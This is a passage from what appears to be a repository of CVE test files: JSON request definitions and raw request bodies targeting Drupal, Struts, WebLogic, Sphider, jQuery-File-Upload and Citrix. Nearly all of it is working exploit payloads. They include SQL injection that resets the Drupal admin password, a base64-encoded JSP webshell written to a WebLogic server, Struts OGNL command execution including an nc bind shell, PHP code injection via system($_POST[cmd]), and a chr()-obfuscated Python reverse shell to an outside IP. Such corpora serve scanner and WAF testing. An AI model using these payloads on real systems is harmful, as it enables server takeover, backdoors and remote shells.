ODAlOTkpJTJDJUUyJTgwJTk5Rmlyc3RuYW1lJUUyJTgwJTk5KSUzQiUyMCVFMiU4MCU5Mw=="
14 | }
15 | }
16 | ]
17 |
--------------------------------------------------------------------------------
/tests/CVE-2014-3704/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/?q=node&destination=node",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Content-Length": "120"
9 | },
10 | "Data": {
11 | "pass": "lol",
12 | "form_build_id": "",
13 | "form_id": "user_login_block",
14 | "op": "Log+in",
15 | "name[0 or updatexml(0,concat(0xa,user()),0)%23]": "bob",
16 | "name[0]": "a"
17 | },
18 | "Reference": "https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704"
19 | },
20 | {
21 | "Method": "POST",
22 | "URI": "/?q=node&destination=node",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Content-Type": "application/x-www-form-urlencoded",
26 | "Content-Length": "120"
27 | },
28 | "Data": {
29 | "pass": "lol",
30 | "form_build_id": "",
31 | "form_id": "user_login_block",
32 | "op": "Log+in",
33 | "name[0%20;update+users+set+name%3d'newuser'+,+pass+%3d+'123456789'+where+uid+%3d+'1';;#%20%20]": "bob",
34 | "name[0]": "larry"
35 | },
36 | "Reference": "https://www.exploit-db.com/exploits/34984"
37 | },
38 | {
39 | "Method": "POST",
40 | "URI": "/?q=node&destination=node",
41 | "Headers": {
42 | "User-Agent": "Mozilla/5.0",
43 | "Content-Type": "application/x-www-form-urlencoded",
44 | "Content-Length": "120"
45 | },
46 | "Data": {
47 | "pass": "test",
48 | "form_build_id": "",
49 | "form_id": "user_login_block",
50 | "op": "Log+in",
51 | "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g'+where+uid+%3D+'1';;#%20%20]": "test3",
52 | "name[0]": "test",
53 | "test2": "test"
54 | },
55 | "Reference": "https://www.exploit-db.com/exploits/34993"
56 | }
57 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test1.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
11 | echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2012-1007/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/struts2-showcase/person/editPerson.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "persons%281%29.name": "",
11 | "persons%281%29.lastName": "",
12 | "method%3Asave": "Save+all+persons"
13 | }
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/struts2-rest-showcase/orders",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Content-Type": "application/x-www-form-urlencoded"
21 | },
22 | "Data": {
23 | "clientName": "",
24 | "amount": ""
25 | }
26 | },
27 | {
28 | "Method": "POST",
29 | "URI": "/struts-examples/upload/upload-submit.do?queryParam=Successful",
30 | "Headers": {
31 | "User-Agent": "Mozilla/5.0",
32 | "Content-Type": "multipart/form-data; boundary=---------------------------41701"
33 | },
34 | "Data-File": "test1.txt"
35 | },
36 | {
37 | "Method": "POST",
38 | "URI": "/struts-cookbook/processSimple.do",
39 | "Headers": {
40 | "User-Agent": "Mozilla/5.0",
41 | "Content-Type": "application/x-www-form-urlencoded"
42 | },
43 | "Data": {
44 | "name": "XYZ",
45 | "secret": "XYZ",
46 | "color": "red",
47 | "confirm": "on",
48 | "rating": "1",
49 | "message": ""
50 | }
51 | },
52 | {
53 | "Method": "POST",
54 | "URI": "/struts-cookbook/processDyna.do",
55 | "Headers": {
56 | "User-Agent": "Mozilla/5.0",
57 | "Content-Type": "application/x-www-form-urlencoded"
58 | },
59 | "Data": {
60 | "name": "ZYZ",
61 | "secret": "",
62 | "color": "red",
63 | "message": ""
64 | }
65 | }
66 | ]
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/test1.xml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/_async/AsyncResponseService",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Length": "2159",
8 | "Content-Type": "text/xml",
9 | "Accept-Encoding": "gzip, deflate, compress",
10 | "Accept": "*/*"
11 | },
12 | "Data-File": "test1.txt",
13 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/_async/AsyncResponseService",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Content-Length": "955",
21 | "Content-Type": "text/xml",
22 | "Accept-Encoding": "gzip, deflate, compress",
23 | "Accept": "*/*"
24 | },
25 | "Data-File": "test2.txt",
26 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
27 | },
28 | {
29 | "Method": "POST",
30 | "URI": "/_async/AsyncResponseService",
31 | "Headers": {
32 | "User-Agent": "Mozilla/5.0",
33 | "Content-Length": "955",
34 | "Content-Type": "text/xml",
35 | "Accept-Encoding": "gzip, deflate, compress",
36 | "Accept": "*/*"
37 | },
38 | "Data-File": "test3.txt",
39 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
40 | },
41 | {
42 | "Method": "POST",
43 | "URI": "/_async/AsyncResponseServiceHttps",
44 | "Headers": {
45 | "User-Agent": "Mozilla/5.0",
46 | "Content-Length": "955",
47 | "Content-Type": "text/xml",
48 | "Accept-Encoding": "gzip, deflate",
49 | "Accept": "*/*",
50 | "Accept-Language": "en"
51 | },
52 | "Data-File": "test4.txt",
53 | "Reference": "https://www.exploit-db.com/exploits/46780"
54 | },
55 | {
56 | "Method": "POST",
57 | "URI": "/_async/AsyncResponseService",
58 | "Headers": {
59 | "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13",
60 | "Content-Length": "1090",
61 | "Content-Type": "text/xml",
62 | "Connection": "keep-alive",
63 | "Accept-Encoding": "gzip, deflate",
64 | "Accept": "*/*",
65 | "Accept-Language": "en"
66 | },
67 | "Data-File": "test5.txt",
68 | "Reference": "https://riskdiscovery.com/honeydb"
69 | }
70 | ]
--------------------------------------------------------------------------------
/groups.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "name": "struts",
4 | "type": "framework",
5 | "cves": [
6 | "CVE-2010-1870", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394",
7 | "CVE-2013-1966", "CVE-2013-2251", "CVE-2015-0899",
8 | "CVE-2016-1182", "CVE-2016-3087", "CVE-2017-12611", "CVE-2017-9791", "CVE-2018-11776",
9 | "CVE-2011-3923", "CVE-2012-1007", "CVE-2013-2248", "CVE-2014-0114", "CVE-2016-1181",
10 | "CVE-2016-3081", "CVE-2016-4438", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-1327"
11 | ]
12 | },
13 | {
14 | "name": "wordpress",
15 | "type": "cms",
16 | "cves": [
17 | "CVE-2014-6446", "CVE-2016-10033", "CVE-2018-6389", "CVE-2018-7422", "CVE-2019-6703",
18 | "CVE-2016-6896"
19 | ]
20 | },
21 | {
22 | "name": "drupal",
23 | "type": "cms",
24 | "cves": [
25 | "CVE-2006-2743", "CVE-2007-5416", "CVE-2014-3704", "CVE-2018-7600", "CVE-2018-7602",
26 | "CVE-2019-6340", "CVE-2019-6341"
27 | ]
28 | },
29 | {
30 | "name": "rails",
31 | "type": "framework",
32 | "cves": [
33 | "CVE-2019-5418"
34 | ]
35 | },
36 | {
37 | "name": "tomcat",
38 | "type": "framework",
39 | "cves": [
40 | "CVE-2019-0232"
41 | ]
42 | },
43 | {
44 | "name": "uWSGI",
45 | "type": "framework",
46 | "cves": [
47 | "CVE-2018-7490"
48 | ]
49 | },
50 | {
51 | "name": "weblogic",
52 | "type": "framework",
53 | "cves": [
54 | "CVE-2017-10271", "CVE-2018-3252", "CVE-2019-2618", "CVE-2019-2725",
55 | "CVE-2019-2729", "CVE-2020-14882"
56 | ]
57 | },
58 | {
59 | "name": "Magento",
60 | "type": "e-commerce",
61 | "cves": [
62 | "CVE-2015-1397", "CVE-2015-1398", "CVE-2015-1399", "CVE-2016-4010",
63 | "CVE-2019-7139"
64 |
65 | ]
66 | },
67 | {
68 | "name": "vBulletin",
69 | "type": "forum",
70 | "cves": [
71 | "CVE-2016-6195", "CVE-2017-17671", "CVE-2017-17672", "CVE-2019-16759"
72 | ]
73 | },
74 | {
75 | "name": "Jolokia",
76 | "type": "framework",
77 | "cves": [
78 | "CVE-2018-1000129", "CVE-2018-1000130"
79 | ]
80 | },
81 | {
82 | "name": "ColdFusion",
83 | "type": "framework",
84 | "cves": [
85 | "CVE-2018-15961"
86 | ]
87 | }
88 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/test1.txt:
--------------------------------------------------------------------------------
1 | Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325
2 | Connection: close
3 |
4 | -----------------------------60928216114129559951791388325
5 | Content-Disposition: form-data; name=mail
6 |
7 | test324@example.com
8 | -----------------------------60928216114129559951791388325
9 | Content-Disposition: form-data; name=name
10 |
11 | test2345
12 | -----------------------------60928216114129559951791388325
13 | Content-Disposition: form-data; name=files[user_picture_0]; filename=xxx\xc0.gif
14 | Content-Type: image/gif
15 |
16 | GIF
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 | -----------------------------60928216114129559951791388325
25 | Content-Disposition: form-data; name=user_picture[0][fids]
26 |
27 |
28 | -----------------------------60928216114129559951791388325
29 | Content-Disposition: form-data; name=user_picture[0][display]
30 |
31 | 1
32 | -----------------------------60928216114129559951791388325
33 | Content-Disposition: form-data; name=form_build_id
34 |
35 | form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk
36 | -----------------------------60928216114129559951791388325
37 | Content-Disposition: form-data; name=form_id
38 |
39 | user_register_form
40 | -----------------------------60928216114129559951791388325
41 | Content-Disposition: form-data; name=contact
42 |
43 | 1
44 | -----------------------------60928216114129559951791388325
45 | Content-Disposition: form-data; name=timezone
46 |
47 | America/New_York
48 | -----------------------------60928216114129559951791388325
49 | Content-Disposition: form-data; name=_triggering_element_name
50 |
51 | user_picture_0_upload_button
52 | -----------------------------60928216114129559951791388325
53 | Content-Disposition: form-data; name=_triggering_element_value
54 |
55 | Upload
56 | -----------------------------60928216114129559951791388325
57 | Content-Disposition: form-data; name=_drupal_ajax
58 |
59 | 1
60 | -----------------------------60928216114129559951791388325
61 | Content-Disposition: form-data; name=ajax_page_state[theme]
62 |
63 | bartik
64 | -----------------------------60928216114129559951791388325
65 | Content-Disposition: form-data; name=ajax_page_state[theme_token]
66 |
67 |
68 | -----------------------------60928216114129559951791388325
69 | Content-Disposition: form-data; name=ajax_page_state[libraries]
70 |
71 | bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base
72 | -----------------------------60928216114129559951791388325--
73 |
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/test2.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2006-2743/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------7d6381c1b00a2
2 | Content-Disposition: form-data; name="edit[title]"
3 |
4 | titolo
5 | -----------------------------7d6381c1b00a2
6 | Content-Disposition: form-data; name="edit[body]"
7 |
8 | corpo
9 | -----------------------------7d6381c1b00a2
10 | Content-Disposition: form-data; name="edit[format]"
11 |
12 | 1
13 | -----------------------------7d6381c1b00a2
14 | Content-Disposition: form-data; name="edit[form_id]"
15 |
16 | story_node_form
17 | -----------------------------7d6381c1b00a2
18 | Content-Disposition: form-data; name="edit[name]"
19 |
20 | user
21 | -----------------------------7d6381c1b00a2
22 | Content-Disposition: form-data; name="edit[date]"
23 |
24 | 2019-08-30 23:59:59 +0000
25 | -----------------------------7d6381c1b00a2
26 | Content-Disposition: form-data; name="edit[status]"
27 |
28 | 1
29 | -----------------------------7d6381c1b00a2
30 | Content-Disposition: form-data; name="edit[promote]"
31 |
32 | 1
33 | -----------------------------7d6381c1b00a2
34 | Content-Disposition: form-data; name="edit[comment]"
35 |
36 | 2
37 | -----------------------------7d6381c1b00a2
38 | Content-Disposition: form-data; name="edit[path]"
39 |
40 |
41 | -----------------------------7d6381c1b00a2
42 | Content-Disposition: form-data; name="edit[menu][title]"
43 |
44 |
45 | -----------------------------7d6381c1b00a2
46 | Content-Disposition: form-data; name="edit[menu][description]"
47 |
48 |
49 | -----------------------------7d6381c1b00a2
50 | Content-Disposition: form-data; name="edit[menu][pid]"
51 |
52 | 1
53 | -----------------------------7d6381c1b00a2
54 | Content-Disposition: form-data; name="edit[menu][path]"
55 |
56 |
57 | -----------------------------7d6381c1b00a2
58 | Content-Disposition: form-data; name="edit[menu][weight]"
59 |
60 | 0
61 | -----------------------------7d6381c1b00a2
62 | Content-Disposition: form-data; name="edit[menu][mid]"
63 |
64 | 0
65 | -----------------------------7d6381c1b00a2
66 | Content-Disposition: form-data; name="edit[menu][type]"
67 |
68 | 86
69 | -----------------------------7d6381c1b00a2
70 | Content-Disposition: form-data; name="edit[upload]"; filename="suntzu78063.php.jpg"
71 | Content-Type: image/jpeg
72 |
73 |
80 | -----------------------------7d6381c1b00a2
81 | Content-Disposition: form-data; name="fileop"
82 |
83 | Attach
84 | -----------------------------7d6381c1b00a2
85 | Content-Disposition: form-data; name="edit[fileop]"
86 |
87 | http://localhost/drupal?q=upload/js
88 | -----------------------------7d6381c1b00a2
89 | Content-Disposition: form-data; name="edit[vid]"
90 |
91 |
92 | -----------------------------7d6381c1b00a2--
--------------------------------------------------------------------------------
/tests/CVE-2014-5194/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/admin/admin.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Connection": "close"
9 | },
10 | "Data": {
11 | "f": "settings",
12 | "Submit": "1",
13 | "_version_nr": "1.3.5",
14 | "_language": "en",
15 | "_template": "standard",
16 | "_admin_email": "admin@localhost",
17 | "_print_results": "1",
18 | "_tmp_dir": "tmp",
19 | "_log_dir": "log",
20 | "_log_format": "html",
21 | "_min_words_per_page": "10",
22 | "_min_word_length": "3",
23 | "_word_upper_bound": "100;system($_POST[cmd])",
24 | "_index_numbers": "1",
25 | "_index_meta_keywords": "1",
26 | "_pdftotext_path": "c:\\temp\\pdftotext.exe",
27 | "_catdoc_path": "c:\\temp\\catdoc.exe",
28 | "_xls2csv_path": "c:\\temp\\xls2csv",
29 | "_catppt_path": "c:\\temp\\catppt",
30 | "_user_agent": "Sphider",
31 | "_min_delay": "0",
32 | "_strip_sessids": "1",
33 | "_results_per_page": "10",
34 | "_cat_columns": "2",
35 | "_bound_search_result": "0",
36 | "_length_of_link_desc": "0",
37 | "_links_to_next": "9",
38 | "_show_meta_description": "1",
39 | "_show_query_scores": "1",
40 | "_show_categories": "1",
41 | "_desc_length": "250",
42 | "_did_you_mean_enabled": "1",
43 | "_suggest_enabled": "1",
44 | "_suggest_history": "1",
45 | "_suggest_rows": "10",
46 | "_title_weight": "20",
47 | "_domain_weight": "60",
48 | "_path_weight": "10",
49 | "_meta_weight": "5"
50 | },
51 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2014/5194.py"
52 | },
53 | {
54 | "Method": "POST",
55 | "URI": "/settings/conf.php",
56 | "Headers": {
57 | "User-Agent": "Mozilla/5.0",
58 | "Content-Type": "application/x-www-form-urlencoded",
59 | "Connection": "close"
60 | },
61 | "Data": {
62 | "cmd": "whoami"
63 | },
64 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2014/5194.py"
65 | },
66 | {
67 | "Method": "POST",
68 | "URI": "/settings/conf.php",
69 | "Headers": {
70 | "User-Agent": "Mozilla/5.0",
71 | "Content-Type": "application/x-www-form-urlencoded",
72 | "Connection": "close"
73 | },
74 | "Data": {
75 | "cmd": "cat /etc/hostname"
76 | },
77 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2014/5194.py"
78 | }
79 | ]
--------------------------------------------------------------------------------
/tests/CVE-2012-0394/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/struts2-blank/example/HelloWorld.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | }
9 | },
10 | {
11 | "Method": "GET",
12 | "URI": "/some.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0",
15 | "Connection": "close"
16 | },
17 | "Reference": "http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/"
18 | },
19 | {
20 | "Method": "GET",
21 | "URI": "/some.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=netstat -an",
22 | "Headers": {
23 | "User-Agent": "Mozilla/5.0",
24 | "Connection": "close"
25 | }
26 | },
27 | {
28 | "Method": "GET",
29 | "URI": "/some.action?debug=command&expression=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(new%20java.lang.ProcessBuilder('uname%20-a').start().getInputStream())).readLine()",
30 | "Headers": {
31 | "User-Agent": "Mozilla/5.0",
32 | "Connection": "close"
33 | },
34 | "Reference": "https://gist.github.com/mgeeky/5ba0170a5fd0171eb91bc1fd0f2618b7"
35 | },
36 | {
37 | "Method": "GET",
38 | "URI": "/some.action?debug=command&expression=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'/bin/nc','-l','-p','4444','-e','\"/bin/bash%20-i\"'}).start().getInputStream())).readLine()",
39 | "Headers": {
40 | "User-Agent": "Mozilla/5.0",
41 | "Connection": "close"
42 | },
43 | "Reference": "https://gist.github.com/mgeeky/5ba0170a5fd0171eb91bc1fd0f2618b7"
44 | },
45 | {
46 | "Method": "GET",
47 | "URI": "/Test.action?debug=command&expression=%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc')",
48 | "Headers": {
49 | "User-Agent": "Mozilla/5.0",
50 | "Connection": "close"
51 | },
52 | "Reference": "https://www.exploit-db.com/exploits/18329"
53 | }
54 | ]
55 |
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/server/php/upload.class.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/form-data"
8 | },
9 | "File-Upload-Name": "scoobydoo.php",
10 | "File-Upload-File": "file1.txt",
11 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
12 | },
13 | {
14 | "Method": "POST",
15 | "URI": "/example/upload.php",
16 | "Headers": {
17 | "User-Agent": "Mozilla/5.0",
18 | "Content-Type": "multipart/form-data"
19 | },
20 | "File-Upload-Name": "scoobydoo.php",
21 | "File-Upload-File": "file1.txt",
22 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
23 | },
24 | {
25 | "Method": "POST",
26 | "URI": "/server/php/UploadHandler.php",
27 | "Headers": {
28 | "User-Agent": "Mozilla/5.0",
29 | "Content-Type": "multipart/form-data"
30 | },
31 | "File-Upload-Name": "scoobydoo.php",
32 | "File-Upload-File": "file1.txt",
33 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
34 | },
35 | {
36 | "Method": "POST",
37 | "URI": "/php/index.php",
38 | "Headers": {
39 | "User-Agent": "Mozilla/5.0",
40 | "Content-Type": "multipart/form-data"
41 | },
42 | "File-Upload-Name": "scoobydoo.php",
43 | "File-Upload-File": "file1.txt",
44 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
45 | },
46 | {
47 | "Method": "POST",
48 | "URI": "/jQuery-File-Upload/server/php/upload.class.php",
49 | "Headers": {
50 | "User-Agent": "Mozilla/5.0",
51 | "Content-Type": "multipart/form-data"
52 | },
53 | "File-Upload-Name": "scoobydoo.php",
54 | "File-Upload-File": "file1.txt",
55 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
56 | },
57 | {
58 | "Method": "POST",
59 | "URI": "/jQuery-File-Upload/example/upload.php",
60 | "Headers": {
61 | "User-Agent": "Mozilla/5.0",
62 | "Content-Type": "multipart/form-data"
63 | },
64 | "File-Upload-Name": "scoobydoo.php",
65 | "File-Upload-File": "file1.txt",
66 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
67 | },
68 | {
69 | "Method": "POST",
70 | "URI": "/jQuery-File-Upload/server/php/UploadHandler.php",
71 | "Headers": {
72 | "User-Agent": "Mozilla/5.0",
73 | "Content-Type": "multipart/form-data"
74 | },
75 | "File-Upload-Name": "scoobydoo.php",
76 | "File-Upload-File": "file1.txt",
77 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
78 | },
79 | {
80 | "Method": "POST",
81 | "URI": "/jQuery-File-Upload/php/index.php",
82 | "Headers": {
83 | "User-Agent": "Mozilla/5.0",
84 | "Content-Type": "multipart/form-data"
85 | },
86 | "File-Upload-Name": "scoobydoo.php",
87 | "File-Upload-File": "file1.txt",
88 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
89 | }
90 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/test1.txt:
--------------------------------------------------------------------------------
1 | url=127.0.0.1&desc=desc&UI_inuse=a&title=%5B%25+template.new%28%7B%27BLOCK%27%3D%27print+readpipe%28chr%2847%29+.+chr%28118%29+.+chr%2897%29+.+chr%28114%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2832%29+.+chr%2845%29+.+chr%2899%29+.+chr%2832%29+.+chr%2839%29+.+chr%28105%29+.+chr%28109%29+.+chr%28112%29+.+chr%28111%29+.+chr%28114%29+.+chr%28116%29+.+chr%2832%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2844%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2844%29+.+chr%28111%29+.+chr%28115%29+.+chr%2859%29+.+chr%28115%29+.+chr%2861%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2840%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2865%29+.+chr%2870%29+.+chr%2895%29+.+chr%2873%29+.+chr%2878%29+.+chr%2869%29+.+chr%2884%29+.+chr%2844%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2883%29+.+chr%2879%29+.+chr%2867%29+.+chr%2875%29+.+chr%2895%29+.+chr%2883%29+.+chr%2884%29+.+chr%2882%29+.+chr%2869%29+.+chr%2865%29+.+chr%2877%29+.+chr%2841%29+.+chr%2859%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%28111%29+.+chr%28110%29+.+chr%28110%29+.+chr%28101%29+.+chr%2899%29+.+chr%28116%29+.+chr%2840%29+.+chr%2840%29+.+chr%2834%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2834%29+.+chr%2844%29+.+chr%2857%29+.+chr%2848%29+.+chr%2841%29+.+chr%2841%29+.+chr%2859%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2848%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2849%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2850%29+.+chr%2841%29+.+chr%2859%29+.+chr%28112%29+.+chr%2861%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%2897%29+.+chr%28108%29+.+chr%28108%29+.+chr%2840%29+.+